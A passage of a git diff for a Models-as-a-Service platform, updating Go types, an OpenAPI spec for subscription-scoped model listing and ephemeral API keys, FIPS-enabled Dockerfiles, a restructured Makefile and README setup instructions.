+type SubscriptionInfo struct { + SubscriptionIDHeader string `json:"subscription_id_header"` + SubscriptionDescription string `json:"subscription_description"` + DisplayName string `json:"display_name,omitempty"` + Priority int32 `json:"priority"` + ModelRefs []ModelRefInfo `json:"model_refs"` + OrganizationID string `json:"organization_id,omitempty"` + CostCenter string `json:"cost_center,omitempty"` + Labels map[string]string `json:"labels,omitempty"` +} + +// ModelRefInfo represents a model reference with its rate limits. +type ModelRefInfo struct { + Name string `json:"name"` + Namespace string `json:"namespace,omitempty"` + TokenRateLimits []TokenRateLimit `json:"token_rate_limits,omitempty"` + BillingRate *BillingRate `json:"billing_rate,omitempty"` +} + +// TokenRateLimit defines a token rate limit. +type TokenRateLimit struct { + Limit int64 `json:"limit"` + Window string `json:"window"` +} + +// BillingRate defines billing information. +type BillingRate struct { + PerToken string `json:"per_token"` +} + // ErrorResponse represents an error response (deprecated - use SelectResponse instead). type ErrorResponse struct { Error string `json:"error"` // Error code (e.g., "bad_request", "not_found") diff --git a/maas-api/openapi3.yaml b/maas-api/openapi3.yaml index ee9562a57..2ed9293de 100644 --- a/maas-api/openapi3.yaml +++ b/maas-api/openapi3.yaml @@ -4,7 +4,11 @@ info: description: Models as a Service Billing and Management API version: "1.0" servers: - - url: http://localhost:8080 + - url: '{serverUrl}' + variables: + serverUrl: + default: http://localhost:8080 + description: API server URL (e.g. https://maas-api.example.com) security: - bearerAuth: [] paths: @@ -30,41 +34,139 @@ paths: tags: - models summary: Lists available large language models in OpenAI-compatible format - description: Lists available large language models in OpenAI-compatible format + description: | + Lists available large language models in OpenAI-compatible format. 
+ + Behavior depends on authentication method and headers: + + **API key authentication** (Bearer sk-oai-*): + - Returns models available via the subscription bound to the API key at mint time + - The X-MaaS-Subscription header is automatically injected by the gateway from the key's subscription + - No manual headers required + + **User token authentication** (Bearer without sk-oai- prefix): + - Default (no X-MaaS-Subscription header): Returns all models from all accessible subscriptions + - With X-MaaS-Subscription header: Returns models from the specified subscription only (allows users to scope their query) + + The X-MaaS-Subscription header provides flexible filtering for user tokens while API keys are automatically scoped. operationId: models#list_llms + parameters: + - in: header + name: X-MaaS-Subscription + schema: + type: string + required: false + description: | + (User tokens only) Filter models to a specific subscription by name. + When provided with a user token, behaves like an API key request - returns only models from that subscription. + For API keys, this header is automatically injected by the gateway and should not be manually specified. + example: premium-subscription responses: + "401": + description: Unauthorized. Missing or invalid Authorization header. + content: + application/json: + schema: + $ref: '#/components/schemas/ErrorResponse' + example: + error: + message: "Authorization required" + type: "authentication_error" + "403": + description: | + Forbidden. Subscription access error. 
Possible cases: + - API key has no subscription bound (invalid state) + - Access denied to the subscription bound to the API key + - Subscription not found + - User has no accessible subscriptions + content: + application/json: + schema: + $ref: '#/components/schemas/ErrorResponse' + examples: + no_subscription_bound: + summary: API key has no subscription bound + value: + error: + message: "API key has no subscription bound" + type: "permission_error" + access_denied: + summary: Access denied to subscription + value: + error: + message: "access denied to subscription" + type: "permission_error" + not_found: + summary: Subscription not found + value: + error: + message: "subscription not found" + type: "permission_error" + no_subscription: + summary: No accessible subscriptions + value: + error: + message: "no subscription found for user" + type: "permission_error" "200": description: OK response. content: application/json: schema: $ref: '#/components/schemas/ModelListResponse' - example: - object: list - data: - - created: 1672531200 - id: llama-2-7b-chat - object: model - owned_by: model-namespace - ready: true - url: https://api.example.com/v1/models/llama-2-7b-chat - - created: 1672531200 - id: mistral-7b-instruct - object: model - owned_by: model-namespace - ready: true - url: https://api.example.com/v1/models/mistral-7b-instruct - - created: 1672531200 - id: granite-8b-code-instruct - object: model - owned_by: model-namespace - ready: false - - created: 1672531200 - id: llama-3-8b-instruct - object: model - owned_by: model-namespace - ready: true - url: https://api.example.com/v1/models/llama-3-8b-instruct + examples: + single_subscription: + summary: Response with single subscription (default) + value: + object: list + data: + - created: 1672531200 + id: llama-2-7b-chat + object: model + owned_by: model-namespace/llama-2-7b-chat + ready: true + url: https://api.example.com/v1/models/llama-2-7b-chat + kind: LLMInferenceService + subscriptions: + - name: 
basic-subscription + - created: 1672531200 + id: mistral-7b-instruct + object: model + owned_by: model-namespace/mistral-7b-instruct + ready: true + url: https://api.example.com/v1/models/mistral-7b-instruct + kind: LLMInferenceService + subscriptions: + - name: basic-subscription + aggregated_subscriptions: + summary: Response with X-MaaS-Return-All-Models (subscription aggregation) + value: + object: list + data: + - created: 1672531200 + id: llama-2-7b-chat + object: model + owned_by: model-namespace/llama-2-7b-chat + ready: true + url: https://api.example.com/v1/models/llama-2-7b-chat + kind: LLMInferenceService + subscriptions: + - name: basic-subscription + displayName: Basic Tier + - name: premium-subscription + displayName: Premium Tier + description: Premium subscription with higher rate limits + - created: 1672531200 + id: granite-8b-code-instruct + object: model + owned_by: model-namespace/granite-8b-code-instruct + ready: true + url: https://api.example.com/v1/models/granite-8b-code-instruct + kind: LLMInferenceService + subscriptions: + - name: premium-subscription + displayName: Premium Tier + description: Premium subscription with higher rate limits "500": description: Internal Server Error response. content: @@ -171,7 +273,7 @@ paths: tags: - api-keys-v2 summary: Create a new hash-based API key - description: Creates a new OpenAI-compatible API key (sk-oai-* format). Supports both permanent keys (no expiration) and expiring keys (with expiresIn parameter). The plaintext key is shown ONLY ONCE at creation time and cannot be retrieved again. + description: Creates a new OpenAI-compatible API key (sk-oai-* format). Name is required for regular keys but optional for ephemeral keys. If expiresIn is not provided, defaults to API_KEY_MAX_EXPIRATION_DAYS (default 90 days) for regular keys, or 1 hour for ephemeral keys. The plaintext key is shown ONLY ONCE at creation time and cannot be retrieved again. 
operationId: api-keys-v2#create requestBody: required: true @@ -179,30 +281,45 @@ paths: application/json: schema: type: object - required: - - name properties: name: type: string - description: Human-readable name for the API key + description: Human-readable name for the API key. Required for regular keys, optional for ephemeral keys. description: type: string description: Optional description expiresIn: type: string - description: Optional expiration duration (e.g., "30d", "90d", "1h"). Omit for permanent key. + description: Expiration duration (e.g., "30d", "90d", "1h"). Defaults to API_KEY_MAX_EXPIRATION_DAYS for regular keys, 1 hour for ephemeral keys. + ephemeral: + type: boolean + description: Create a short-lived programmatic key. Defaults to false. Ephemeral keys have 1hr default and maximum expiration (enforced), and optional name. + default: false + subscription: + type: string + description: Optional MaaSSubscription resource name to bind to this key. When omitted, the user's highest-priority accessible subscription is used (spec.priority, descending). examples: - permanent_key: - summary: Permanent API key (no expiration) + default_expiration: + summary: API key with default expiration (API_KEY_MAX_EXPIRATION_DAYS) value: - name: my-permanent-key + name: my-api-key description: Production API key - expiring_key: - summary: Expiring API key (90 days) + custom_expiration: + summary: API key with custom expiration (30 days) value: - name: my-expiring-key - description: 90-day test key - expiresIn: 90d + name: my-short-lived-key + description: 30-day test key + expiresIn: 30d + with_subscription: + summary: API key bound to specific subscription + value: + name: my-premium-key + description: Key for premium subscription + subscription: premium-subscription + ephemeral_key: + summary: Ephemeral key for programmatic use (1hr expiration) + value: + ephemeral: true responses: "201": description: Created response. 
@@ -210,6 +327,15 @@ paths: application/json: schema: type: object + required: + - key + - keyPrefix + - id + - name + - subscription + - createdAt + - expiresAt + - ephemeral properties: key: type: string @@ -223,6 +349,9 @@ paths: name: type: string description: Name of the key + subscription: + type: string + description: MaaSSubscription name bound to this key at creation time createdAt: type: string format: date-time @@ -230,9 +359,16 @@ paths: expiresAt: type: string format: date-time - description: Expiration timestamp (RFC3339), omitted for permanent keys + description: Expiration timestamp (RFC3339) + ephemeral: + type: boolean + description: Whether this is a short-lived programmatic key "400": - description: Bad Request response. + description: | + Bad Request. Includes validation errors and subscription resolution failures + for API key creation. Subscription-related failures use a single error code + (`invalid_subscription`) and message so clients cannot distinguish + not-found, access denied, or no default subscription. "401": description: Unauthorized response. /v1/api-keys/search: @@ -240,7 +376,7 @@ paths: tags: - api-keys-v2 summary: Search and filter API keys - description: Search API keys with flexible filtering, sorting, and pagination. Supports filtering by username (admin-only), status, sorting by multiple fields, and pagination. + description: Search API keys with flexible filtering, sorting, and pagination. Supports filtering by username (admin-only), status, sorting by multiple fields, and pagination. Ephemeral keys are excluded by default. operationId: api-keys-v2#search requestBody: required: false @@ -261,6 +397,10 @@ paths: type: string enum: [active, revoked, expired] description: Filter by status (active, revoked, expired). Defaults to active only. + includeEphemeral: + type: boolean + description: Include ephemeral keys in results. Defaults to false. 
+ default: false sort: type: object properties: @@ -286,7 +426,7 @@ paths: default: 0 examples: default_search: - summary: Default search (active keys, newest first) + summary: Default search (active keys, newest first, excludes ephemeral) value: filters: status: ["active"] @@ -308,6 +448,12 @@ paths: pagination: limit: 20 offset: 0 + include_ephemeral: + summary: Include ephemeral keys in search + value: + filters: + status: ["active"] + includeEphemeral: true responses: "200": description: OK response. @@ -320,13 +466,17 @@ paths: data: - id: key_abc123 name: my-production-key + subscription: premium-subscription creationDate: "2024-01-15T10:30:00Z" status: active + ephemeral: false - id: key_def456 name: my-test-key + subscription: basic-subscription creationDate: "2024-01-14T09:15:00Z" expirationDate: "2024-04-14T09:15:00Z" status: active + ephemeral: false has_more: true "400": description: Bad Request. Invalid search parameters. @@ -445,14 +595,81 @@ paths: example: id: key_abc123 name: my-production-key + subscription: premium-subscription creationDate: "2024-01-15T10:30:00Z" status: revoked + ephemeral: false "404": description: Not Found. API key not found. "401": description: Unauthorized response. "403": description: Forbidden. User trying to revoke another user's key. + /v1/subscriptions: + get: + tags: + - subscriptions + summary: List all subscriptions the authenticated user has access to + description: Returns all MaaSSubscription resources the user has access to based on group membership or username. Useful for UIs that need to show all user subscriptions. + operationId: subscriptions#list + responses: + "200": + description: OK response. 
+ content: + application/json: + schema: + type: array + items: + $ref: '#/components/schemas/SubscriptionListItem' + example: + - subscription_id_header: free-tier + subscription_description: Free Tier + - subscription_id_header: premium + subscription_description: Premium Plan + "500": + description: Internal Server Error response. + content: + application/json: + schema: + $ref: '#/components/schemas/ErrorResponse' + /v1/model/{model-id}/subscriptions: + get: + tags: + - subscriptions + summary: List subscriptions the user has access to for a specific model + description: Returns MaaSSubscription resources the user has access to that include the specified model in their modelRefs. The model-id parameter must be the MaaSModelRef resource name (e.g. "facebook-opt-125m-simulated"), not the served model name (e.g. "facebook/opt-125m") or the route path. Useful for populating a subscription dropdown when the user must specify X-MaaS-Subscription. + operationId: subscriptions#list_for_model + parameters: + - in: path + name: model-id + schema: + type: string + required: true + description: The MaaSModelRef resource name (e.g. "facebook-opt-125m-simulated"). This is the name of the MaaSModelRef, not the served model ID or the route path. + responses: + "200": + description: OK response. + content: + application/json: + schema: + type: array + items: + $ref: '#/components/schemas/SubscriptionListItem' + example: + - subscription_id_header: premium + subscription_description: Premium Plan + "400": + description: Bad Request. Missing model-id parameter. + content: + application/json: + schema: + $ref: '#/components/schemas/ErrorResponse' + "500": + description: Internal Server Error response. 
+ content: + application/json: + schema: + $ref: '#/components/schemas/ErrorResponse' components: securitySchemes: bearerAuth: @@ -466,9 +683,20 @@ components: type: object properties: error: - type: string - description: Error message - example: Failed to retrieve models + type: object + description: Error details + properties: + message: + type: string + description: Human-readable error message + example: Failed to retrieve models + type: + type: string + description: Error type classification + example: server_error + required: + - message + - type required: - error @@ -496,34 +724,27 @@ components: items: $ref: '#/components/schemas/Model' description: Array of model objects - example: - - created: 1672531200 - id: llama-2-7b-chat - object: model - owned_by: model-namespace - ready: true - url: https://api.example.com/v1/models/llama-2-7b-chat - - created: 1672531200 - id: mistral-7b-instruct - object: model - owned_by: model-namespace - ready: true - url: https://api.example.com/v1/models/mistral-7b-instruct example: object: list data: - created: 1672531200 id: llama-2-7b-chat object: model - owned_by: model-namespace + owned_by: model-namespace/llama-2-7b-chat ready: true url: https://api.example.com/v1/models/llama-2-7b-chat + kind: LLMInferenceService + subscriptions: + - name: basic-subscription - created: 1672531200 id: mistral-7b-instruct object: model - owned_by: model-namespace + owned_by: model-namespace/mistral-7b-instruct ready: true url: https://api.example.com/v1/models/mistral-7b-instruct + kind: LLMInferenceService + subscriptions: + - name: basic-subscription required: - object - data @@ -547,8 +768,8 @@ components: format: int64 owned_by: type: string - description: The organization that owns the model - example: model-namespace + description: "The namespace and MaaSModelRef name (format: namespace/name)" + example: model-namespace/llama-2-7b-chat ready: type: boolean description: Model ready status @@ -557,19 +778,84 @@ components: type: 
string description: Model URL (optional) example: https://api.example.com/v1/models/llama-2-7b-chat + modelDetails: + type: object + description: Additional model metadata from MaaSModelRef annotations + properties: + displayName: + type: string + description: Human-readable display name (from openshift.io/display-name annotation) + example: Llama 2 7B Chat + description: + type: string + description: Model description (from openshift.io/description annotation) + example: A large language model optimized for chat use cases + genaiUseCase: + type: string + description: GenAI use case category (from opendatahub.io/genai-use-case annotation) + example: chat + contextWindow: + type: string + description: Context window size (from opendatahub.io/context-window annotation) + example: "4096" + kind: + type: string + description: The model reference kind (e.g., "LLMInferenceService") + example: LLMInferenceService + subscriptions: + type: array + items: + $ref: '#/components/schemas/SubscriptionInfo' + description: | + Array of subscriptions that provide access to this model. + When X-MaaS-Return-All-Models is used, models accessible via multiple + subscriptions will have multiple entries in this array. 
+ example: + - name: premium-subscription + displayName: Premium Tier + description: Premium subscription with higher rate limits example: created: 1672531200 id: llama-2-7b-chat object: model - owned_by: model-namespace + owned_by: model-namespace/llama-2-7b-chat ready: true url: https://api.example.com/v1/models/llama-2-7b-chat + modelDetails: + displayName: Llama 2 7B Chat + description: A large language model optimized for chat use cases + genaiUseCase: chat + contextWindow: "4096" + kind: LLMInferenceService + subscriptions: + - name: premium-subscription + displayName: Premium Tier + description: Premium subscription with higher rate limits required: - id - object - created - owned_by - ready + + # Subscription metadata + SubscriptionInfo: + type: object + properties: + name: + type: string + description: The subscription name + example: premium-subscription + displayName: + type: string + description: Human-readable display name for the subscription + example: Premium Tier + description: + type: string + description: Description of the subscription + example: Premium subscription with higher rate limits + required: + - name # Tier lookup TierLookupRequest: @@ -614,6 +900,93 @@ components: - error - message + # Subscription info for list responses + SubscriptionListItem: + type: object + properties: + subscription_id_header: + type: string + description: Subscription name to use in the X-MaaS-Subscription header + example: premium + subscription_description: + type: string + description: Human-readable description (from description annotation, falls back to display-name, then name) + example: Premium Plan + display_name: + type: string + description: Display name from the openshift.io/display-name annotation + example: Premium + priority: + type: integer + format: int32 + description: Subscription priority (higher = higher priority) + example: 10 + model_refs: + type: array + description: Model references with rate limits + items: + $ref: 
'#/components/schemas/ModelRefInfo' + organization_id: + type: string + description: Organization identifier for metering and billing + example: premium-org + cost_center: + type: string + description: Cost center for usage attribution + example: ai-team + labels: + type: object + additionalProperties: + type: string + description: Additional labels for tracking and metrics + example: + env: production + required: + - subscription_id_header + - subscription_description + - priority + - model_refs + + ModelRefInfo: + type: object + properties: + name: + type: string + description: Name of the MaaSModelRef + example: free-model-ref + namespace: + type: string + description: Namespace where the MaaSModelRef lives + example: llm + token_rate_limits: + type: array + items: + type: object + properties: + limit: + type: integer + format: int64 + description: Maximum number of tokens allowed + example: 100 + window: + type: string + description: "Time window (e.g., 1m, 1h, 24h)" + example: 1m + required: + - limit + - window + billing_rate: + type: object + properties: + per_token: + type: string + description: Cost per token + example: "0.001" + required: + - per_token + required: + - name + # API Key metadata ApiKey: type: object @@ -630,6 +1003,9 @@ components: username: type: string description: Username that owns this API key + subscription: + type: string + description: MaaSSubscription name bound to this key at creation time groups: type: array items: @@ -642,7 +1018,7 @@ components: expirationDate: type: string format: date-time - description: When the API key expires (empty for permanent keys) + description: When the API key expires status: type: string enum: [active, revoked, expired] @@ -651,11 +1027,15 @@ components: type: string format: date-time description: When the API key was last used for validation + ephemeral: + type: boolean + description: Whether this is a short-lived programmatic token required: - id - name - creationDate - status + - ephemeral # API 
Key List Response (paginated) ApiKeyListResponse: @@ -685,5 +1065,7 @@ tags: description: "\U0001F916 Model management service" - name: tiers description: "\U0001F3F7️Tier lookup service" + - name: subscriptions + description: Subscription listing service - name: health description: ❤️ Health check service diff --git a/maas-controller/Dockerfile b/maas-controller/Dockerfile index c1dfb750f..24e5edbd9 100644 --- a/maas-controller/Dockerfile +++ b/maas-controller/Dockerfile @@ -4,7 +4,8 @@ ARG BUILDPLATFORM ARG TARGETPLATFORM FROM --platform=$BUILDPLATFORM registry.access.redhat.com/ubi9/go-toolset:$GOLANG_VERSION AS builder -ARG CGO_ENABLED=0 +ARG CGO_ENABLED=1 +ARG GOEXPERIMENT=strictfipsruntime ARG TARGETOS ARG TARGETARCH @@ -15,7 +16,7 @@ COPY . . USER root -RUN CGO_ENABLED=${CGO_ENABLED} GOOS=${TARGETOS:-linux} GOARCH=${TARGETARCH:-amd64} go build -a -trimpath -ldflags="-s -w" -o manager ./cmd/manager +RUN CGO_ENABLED=${CGO_ENABLED} GOEXPERIMENT=${GOEXPERIMENT} GOOS=${TARGETOS:-linux} GOARCH=${TARGETARCH:-amd64} go build -a -trimpath -ldflags="-s -w" -o manager ./cmd/manager FROM --platform=$TARGETPLATFORM registry.access.redhat.com/ubi9/ubi-minimal:latest diff --git a/maas-controller/Dockerfile.konflux b/maas-controller/Dockerfile.konflux index f1756c1f8..6bc9e5acf 100644 --- a/maas-controller/Dockerfile.konflux +++ b/maas-controller/Dockerfile.konflux @@ -4,7 +4,8 @@ ARG BUILDPLATFORM ARG TARGETPLATFORM FROM --platform=$BUILDPLATFORM registry.access.redhat.com/ubi9/go-toolset@sha256:799cc027d5ad58cdc156b65286eb6389993ec14c496cf748c09834b7251e78dc AS builder -ARG CGO_ENABLED=0 +ARG CGO_ENABLED=1 +ARG GOEXPERIMENT=strictfipsruntime ARG TARGETOS ARG TARGETARCH @@ -14,7 +15,7 @@ RUN go mod download COPY . . 
USER root -RUN CGO_ENABLED=${CGO_ENABLED} GOOS=${TARGETOS:-linux} GOARCH=${TARGETARCH:-amd64} go build -a -trimpath -ldflags="-s -w" -o manager ./cmd/manager +RUN CGO_ENABLED=${CGO_ENABLED} GOEXPERIMENT=${GOEXPERIMENT} GOOS=${TARGETOS:-linux} GOARCH=${TARGETARCH:-amd64} go build -a -trimpath -ldflags="-s -w" -o manager ./cmd/manager FROM --platform=$TARGETPLATFORM registry.access.redhat.com/ubi9/ubi-minimal@sha256:80f3902b6dcb47005a90e14140eef9080ccc1bb22df70ee16b27d5891524edb2 diff --git a/maas-controller/Makefile b/maas-controller/Makefile index bf1fa248f..78f36a49c 100644 --- a/maas-controller/Makefile +++ b/maas-controller/Makefile @@ -1,46 +1,74 @@ # MaaS Controller Makefile # Build and deploy the MaaS control plane (MaaSModelRef, MaaSAuthPolicy, MaaSSubscription) -.PHONY: build run test tidy install uninstall image-build image-push docker-build generate manifests verify-codegen help - -help: - @echo "MaaS Controller make targets:" - @echo " make build - build manager binary to bin/manager" - @echo " make run - build and run manager locally" - @echo " make test - run tests" - @echo " make generate - generate deepcopy code for API types" - @echo " make manifests - generate CRD manifests" - @echo " make install - apply deployment/base/maas-controller/default (CRDs, RBAC, deployment)" - @echo " make uninstall - delete deployment/base/maas-controller/default resources" - @echo " make verify-codegen - run generate + manifests and fail if files changed (CI check)" - @echo " make image-build - build container image (podman/buildah/docker); default IMAGE=quay.io/opendatahub/maas-controller" - @echo " make image-push - build and push image; override with IMAGE=... IMAGE_TAG=..." +##@ General + +# The help target prints out all targets with their descriptions organized +# beneath their categories. The categories are represented by '##@' and the +# target descriptions by '##'. 
The awk command is responsible for reading the +# entire set of makefiles included in this invocation, looking for lines of the +# file as xyz: ## something, and then pretty-format the target and help. Then, +# if there's a line with ##@ something, that gets pretty-printed as a category. +# More info on the usage of ANSI control characters for terminal formatting: +# https://en.wikipedia.org/wiki/ANSI_escape_code#SGR_parameters +# More info on the awk command: +# http://linuxcommand.org/lc3_adv_awk.php + +.PHONY: help +help: ## Display this help. + @awk 'BEGIN {FS = ":.*##"; printf "\nUsage:\n make \033[36m\033[0m\n"} /^[a-zA-Z_0-9-]+:.*?##/ { printf " \033[36m%-15s\033[0m %s\n", $$1, $$2 } /^##@/ { printf "\n\033[1m%s\033[0m\n", substr($$0, 5) } ' $(MAKEFILE_LIST) + @echo "" + @echo "\033[1mOptional build arguments\033[0m (e.g. \033[36mmake build GO_STRICTFIPS=true\033[0m):" + @echo " \033[36mGO_STRICTFIPS=true\033[0m strict FIPS runtime for \033[36mbuild\033[0m / \033[36mrun\033[0m / \033[36mbuild-image\033[0m / \033[36mbuild-image-konflux\033[0m" + +PROJECT_DIR := $(shell dirname $(abspath $(lastword $(MAKEFILE_LIST)))) + +include tools.mk + +BINARY_NAME := manager +BUILD_DIR := $(PROJECT_DIR)/bin + +# Go build environment (override on the CLI, e.g. make build GO_STRICTFIPS=true). +# Strict FIPS uses GOEXPERIMENT=strictfipsruntime; keep CGO_ENABLED=1 for that path. 
+GOOS ?= $(shell go env GOOS) +GOARCH ?= $(shell go env GOARCH) +GO_STRICTFIPS ?= false + +CGO_ENABLED ?= 1 + +ifeq ($(GO_STRICTFIPS),true) + GOEXPERIMENT ?= strictfipsruntime +endif + +GO_ENV := GOOS=$(GOOS) GOARCH=$(GOARCH) +ifdef GOEXPERIMENT + GO_ENV += GOEXPERIMENT=$(GOEXPERIMENT) +endif +ifdef CGO_ENABLED + GO_ENV += CGO_ENABLED=$(CGO_ENABLED) +endif CONTROLLER_GEN_VERSION ?= v0.16.4 CONTROLLER_GEN = $(BUILD_DIR)/controller-gen -BINARY_NAME := manager -BUILD_DIR := bin - -# Container build: use podman, buildah, or docker (default: podman if available, else buildah, else docker) -CONTAINER_RUNTIME := $(shell command -v podman 1>/dev/null 2>&1 && echo podman || (command -v buildah 1>/dev/null 2>&1 && echo buildah || echo docker)) -# Default image -IMAGE ?= quay.io/opendatahub/maas-controller -IMAGE_TAG ?= latest -FULL_IMAGE := $(IMAGE):$(IMAGE_TAG) +##@ Development -build: tidy $(BUILD_DIR) - go build -o $(BUILD_DIR)/$(BINARY_NAME) ./cmd/manager +.PHONY: build +build: tidy $(BUILD_DIR) ## build manager binary to bin/manager + $(GO_ENV) go build -o $(BUILD_DIR)/$(BINARY_NAME) ./cmd/manager $(BUILD_DIR): mkdir -p $(BUILD_DIR) -run: build - ./$(BUILD_DIR)/$(BINARY_NAME) +.PHONY: run +run: build ## build and run manager locally + $(BUILD_DIR)/$(BINARY_NAME) -test: tidy +.PHONY: test +test: tidy ## run tests go test ./... 
+.PHONY: tidy tidy: go mod tidy @@ -48,16 +76,27 @@ tidy: $(CONTROLLER_GEN): | $(BUILD_DIR) GOBIN=$(abspath $(BUILD_DIR)) go install sigs.k8s.io/controller-tools/cmd/controller-gen@$(CONTROLLER_GEN_VERSION) -# Generate deepcopy code for API types -generate: $(CONTROLLER_GEN) +LINT_FIX ?= false +.PHONY: lint +lint: $(GOLANGCI_LINT) ## run golangci-lint (use LINT_FIX=true to fix lint issues) +ifeq ($(LINT_FIX),true) + $(GOLANGCI_LINT) fmt + $(GOLANGCI_LINT) run --fix +else + $(GOLANGCI_LINT) fmt --diff + $(GOLANGCI_LINT) run +endif + +.PHONY: generate +generate: $(CONTROLLER_GEN) ## generate deepcopy code for API types $(CONTROLLER_GEN) object paths="./api/..." -# Generate CRD manifests -manifests: $(CONTROLLER_GEN) +.PHONY: manifests +manifests: $(CONTROLLER_GEN) ## generate CRD manifests $(CONTROLLER_GEN) crd paths="./api/..." output:crd:dir=../deployment/base/maas-controller/crd/bases -# Run generate + manifests and verify no files changed (used by CI) -verify-codegen: generate manifests +.PHONY: verify-codegen +verify-codegen: generate manifests ## run generate + manifests and fail if files changed (CI check) @if ! git diff --quiet HEAD -- api/ ../deployment/base/maas-controller/crd/bases/; then \ echo "ERROR: Generated files are out of date. Please run 'make generate manifests' and commit the results."; \ git diff --stat HEAD -- api/ ../deployment/base/maas-controller/crd/bases/; \ @@ -71,24 +110,16 @@ verify-codegen: generate manifests fi @echo "Generated files are up to date." 
+##@ Deployment + # Install CRDs, RBAC, and manager deployment (default: opendatahub namespace) -install: +.PHONY: install +install: ## apply deployment/base/maas-controller/default (CRDs, RBAC, deployment) kubectl apply -k ../deployment/base/maas-controller/default -uninstall: +.PHONY: uninstall +uninstall: ## delete deployment/base/maas-controller/default resources kubectl delete -k ../deployment/base/maas-controller/default --ignore-not-found -# Build container image (podman, buildah, or docker) -# buildah uses "bud" (build-using-dockerfile) instead of "build" -BUILD_CMD := $(if $(filter buildah,$(CONTAINER_RUNTIME)),bud,build) -image-build: - $(CONTAINER_RUNTIME) $(BUILD_CMD) -t $(FULL_IMAGE) --platform=linux/amd64 -f Dockerfile . - @echo "Built $(FULL_IMAGE) with $(CONTAINER_RUNTIME)" - -# Alias for image-build (backward compatibility) -docker-build: image-build - -# Push image to registry (must be logged in, e.g. podman login quay.io) -image-push: image-build - $(CONTAINER_RUNTIME) push $(FULL_IMAGE) - @echo "Pushed $(FULL_IMAGE)" +## Container image +include container.mk diff --git a/maas-controller/README.md b/maas-controller/README.md index 0386bc7d7..5c844abcb 100644 --- a/maas-controller/README.md +++ b/maas-controller/README.md @@ -35,8 +35,8 @@ Models with no MaaSAuthPolicy or MaaSSubscription are denied at the gateway leve ### CRDs and what they generate As MaaS API and controller are conventionally deployed in the operator namespace (e.g., `opendatahub`), MaaS CRs need to be separated so that they can be managed with lower cluster privileges. Therefore, -- **MaasModelRef** is located in the same namespace as the **HTTPRoute** and **LLMInderenceService** it refers to; and -- **MaaSAuthPolicy** and **MaaSSubscription** are located in a dedicated subscription namespace (default: `models-as-a-service`). Set `--maas-subscription-namespace` or the `MAAS_SUBSCRIPTION_NAMESPACE` env var in `maas-controller` deployment to use another namespace. 
MaaS controller will only watch and reconcile those CRs this configured namespace. +- **MaaSModelRef** is located in the same namespace as the **HTTPRoute** and **LLMInferenceService** it refers to; and +- **MaaSAuthPolicy** and **MaaSSubscription** are located in a dedicated subscription namespace (default: `models-as-a-service`). Set `--maas-subscription-namespace` or the `MAAS_SUBSCRIPTION_NAMESPACE` env var in `maas-controller` deployment to use another namespace. MaaS controller will only watch and reconcile those CRs in this configured namespace. | You create | Controller generates | Per | Targets | | ---------- | -------------------- | --- | ------- | @@ -66,12 +66,12 @@ spec: kind: LLMInferenceService name: my-llmisvc --- -# MaaSAuthPolicy in opendatahub namespace references model in llm namespace +# MaaSAuthPolicy in models-as-a-service namespace references model in llm namespace apiVersion: maas.opendatahub.io/v1alpha1 kind: MaaSAuthPolicy metadata: name: my-policy - namespace: opendatahub + namespace: models-as-a-service spec: modelRefs: - name: my-model @@ -81,7 +81,7 @@ spec: - name: my-group ``` -The controller creates a Kuadrant **AuthPolicy** in the `llm` namespace (where the model and HTTPRoute exist), not in `opendatahub` (where the MaaSAuthPolicy lives). +The controller creates a Kuadrant **AuthPolicy** in the `llm` namespace (where the model and HTTPRoute exist), not in `models-as-a-service` (where the MaaSAuthPolicy lives). **Same model name, different namespaces:** @@ -99,7 +99,7 @@ spec: This creates two separate AuthPolicies: one in `team-a`, one in `team-b`. -**Model list API:** When the MaaS controller is installed, the MaaS API **GET /v1/models** endpoint lists models by reading **MaaSModelRef** CRs (in the API's namespace). Each MaaSModelRef's `metadata.name` becomes the model `id`, and `status.endpoint` / `status.phase` supply the URL and readiness. 
So the set of MaaSModelRef objects is the source of truth for "which models are available" in MaaS. See [docs/content/configuration-and-management/model-listing-flow.md](../docs/content/configuration-and-management/model-listing-flow.md) in the repo for the full flow. +**Model list API:** When the MaaS controller is installed, the MaaS API **GET /v1/models** endpoint lists models by reading **MaaSModelRef** CRs cluster-wide (all namespaces). Each MaaSModelRef's `metadata.name` becomes the model `id`, and `status.endpoint` / `status.phase` supply the URL and readiness. So the set of MaaSModelRef objects is the source of truth for "which models are available" in MaaS. See [docs/content/configuration-and-management/model-listing-flow.md](../docs/content/configuration-and-management/model-listing-flow.md) in the repo for the full flow. ### Model kinds and the provider pattern @@ -182,12 +182,16 @@ deny-unsubscribed (0): matches "NOT in premium-user AND NOT in free-user" ## Authentication -Until API token minting is in place, the controller uses **OpenShift tokens directly** for inference: +Create API keys with `POST /v1/api-keys` on the maas-api (authenticate with your OpenShift token). Each key is bound to one MaaSSubscription at mint time: set `"subscription": "<subscription-name>"` in the JSON body, or omit it and the platform selects the **highest-priority** accessible subscription (`MaaSSubscription.spec.priority`).
```bash -export TOKEN=$(oc whoami -t) -curl -H "Authorization: Bearer $TOKEN" \ - "https://<gateway-host>/llm/<model-name>/v1/chat/completions" \ +MAAS_API="https://<gateway-host>/maas-api" +API_KEY=$(curl -sSk -H "Authorization: Bearer $(oc whoami -t)" -H "Content-Type: application/json" \ + -X POST -d '{"name":"demo","subscription":"<subscription-name>"}' \ + "${MAAS_API}/v1/api-keys" | jq -r .key) + +curl -sSk "https://<gateway-host>/llm/<model-name>/v1/chat/completions" \ + -H "Authorization: Bearer ${API_KEY}" \ -H "Content-Type: application/json" \ -d '{"model":"<model-name>","messages":[{"role":"user","content":"Hello"}],"max_tokens":10}' ``` @@ -256,8 +260,8 @@ kubectl get crd | grep maas.opendatahub.io Install both **regular** and **premium** simulator models and their MaaS policies/subscriptions (from the repository root): ```bash +# Create model namespace (models-as-a-service namespace is auto-created by controller) kubectl create namespace llm --dry-run=client -o yaml | kubectl apply -f - -kubectl create namespace models-as-a-service --dry-run=client -o yaml | kubectl apply -f - kustomize build docs/samples/maas-system | kubectl apply -f - ``` @@ -266,13 +270,13 @@ This creates: ### Regular tier - `LLMInferenceService/facebook-opt-125m-simulated` in `llm` namespace -- `MaaSModelRef/facebook-opt-125m-simulated` in `opendatahub` +- `MaaSModelRef/facebook-opt-125m-simulated` in `llm` - `MaaSAuthPolicy/simulator-access` (group: `free-user`) and `MaaSSubscription/simulator-subscription` (100 tokens/min) in `models-as-a-service` ### Premium tier - `LLMInferenceService/premium-simulated-simulated-premium` in `llm` namespace -- `MaaSModelRef/premium-simulated-simulated-premium` in `opendatahub` +- `MaaSModelRef/premium-simulated-simulated-premium` in `llm` - 